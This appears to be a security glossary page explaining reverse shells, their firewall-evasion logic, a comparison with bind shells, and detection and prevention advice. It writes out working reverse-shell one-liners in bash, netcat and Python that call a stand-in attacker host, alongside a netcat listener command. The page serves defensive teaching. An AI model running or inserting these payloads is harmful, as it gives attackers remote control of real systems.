Reverse Shell
TL;DR: Reverse Shell
A reverse shell, also known as a connect-back shell, is when a compromised system connects to the attacker and gives them a live command-line session.
Why does this matter?
- Reverse shells can bypass firewalls since most firewalls block incoming connections but allow outgoing ones.
- Attackers gain real control because they can run commands just like they are logged in directly.
- Reverse shells are very common since they are a standard step after an attacker exploits a system.
Imagine it this way: instead of the attacker trying to get in, they trick the server into reaching out to them.
What Is a Reverse Shell?
A reverse shell is a remote shell where the victim’s computer starts the connection to the attacker’s computer.
Normally, your computer starts the connection, like when you visit a website. With a reverse shell, this is reversed. After the attacker finds a way to run code, the server connects back to the attacker.
An easy way to remember it:
- Bind shell: You try to connect to the server. If a firewall blocks you, you cannot get through.
- Reverse shell: The server connects to you. Since outgoing connections are usually allowed, you can answer and take control.
Why Reverse Shells Matter
Security teams usually focus on defenses like firewalls, load balancers, and limiting ports. These work until an attacker manages to run code inside the system.
When that happens, the reverse shell becomes the attacker’s main way to stay in.
Why is this dangerous:
-
Outbound traffic is trusted.
Firewalls often allow outgoing traffic on ports like 80 or 443 for updates and APIs. Reverse shells can hide in this allowed traffic.
-
Attackers can maintain access.
Even if the original security hole is fixed, an active shell can still let attackers control the system.
-
It enables lateral movement.
With a shell, attackers can look around the internal network, steal passwords, and move to other computers. One vulnerability can quickly lead to the whole environment being compromised.
How a Reverse Shell Works
A reverse shell has two main parts: the listener and the payload.
1. The Listener (Attacker Side)
The attacker uses a program that waits for connections. Netcat is a common tool for this.
nc -lvnp 4444This command tells the attacker’s computer to listen on port 4444 and wait for a connection.
2. The Payload (Victim Side)
After finding a vulnerability like Remote Code Execution, the attacker runs a command on the victim’s server to open a shell and send it back.
bash -i >& /dev/tcp/attacker-ip/4444 0>&1This command starts a bash shell and sends all input and output to the attacker’s computer.
3. The Connection
The victim’s server starts an outgoing connection. The firewall sees this as normal and allows it. The attacker’s listener accepts the connection, giving the attacker a live shell on the server.
At this stage, the attacker has full interactive control over the server.
Common Reverse Shell Examples
Attackers and ethical hackers adjust their approach based on what tools are available on the target system.
Bash (Common on Linux)
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1Netcat
Used when Netcat is available on the target machine.
nc -e /bin/sh 10.0.0.1 4444Python
Python is very common on modern servers.
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
subprocess.call(["/bin/sh","-i"]);'Reverse Shell vs Bind Shell
Knowing the difference between reverse shells and bind shells helps with defending networks.
| Feature | Bind Shell | Reverse Shell |
|---|---|---|
| Connection direction | Attacker to Victim | Victim to Attacker |
| Firewall impact | Often blocked | Often allowed |
| Network requirements | Direct access needed | Works through NAT and firewalls |
| Typical use case | Internal networks | Real-world attacks |
Who Uses Reverse Shells?
- Penetration testers use reverse shells to prove that a vulnerability can lead to full system compromise.
- Red teams use reverse shells to test how well outbound traffic is controlled.
- Malicious actors use reverse shells to deploy ransomware, steal data, or move further into a network.
- System administrators rarely use reverse shells for remote access. They usually prefer secure SSH tunnels.
Detection and Prevention
Stopping reverse shells takes several layers of defense.
-
Outbound traffic filtering
Servers should not have open access to the internet. Limit which destinations and ports they can use.
-
Behavior monitoring
A web server spawning a shell process, such as/bin/bash or cmd.exe, is highly suspicious.
-
Reduce the attack surface.
Remove unused tools like Netcat, compilers, and extra interpreters from production systems.
Related Terms
- Remote Code Execution (RCE)
- Bind Shell
FAQ: Reverse Shell
Is a reverse shell illegal?
Reverse shells are legal only if you use them on systems you own or have clear permission to test. Using them without permission is illegal.
Why do firewalls allow reverse shells?
Firewalls are built to block incoming threats and usually trust outgoing traffic. Reverse shells take advantage of this.
Can an antivirus detect reverse shells?
Sometimes. Antivirus software that uses signatures can find known shell programs, but fileless shells made with Bash or Python are much harder to detect.
What is the difference between a reverse shell and a webshell?
A webshell is used through a browser and usually stays on the system, but has limited features. A reverse shell gives a live, interactive command-line session.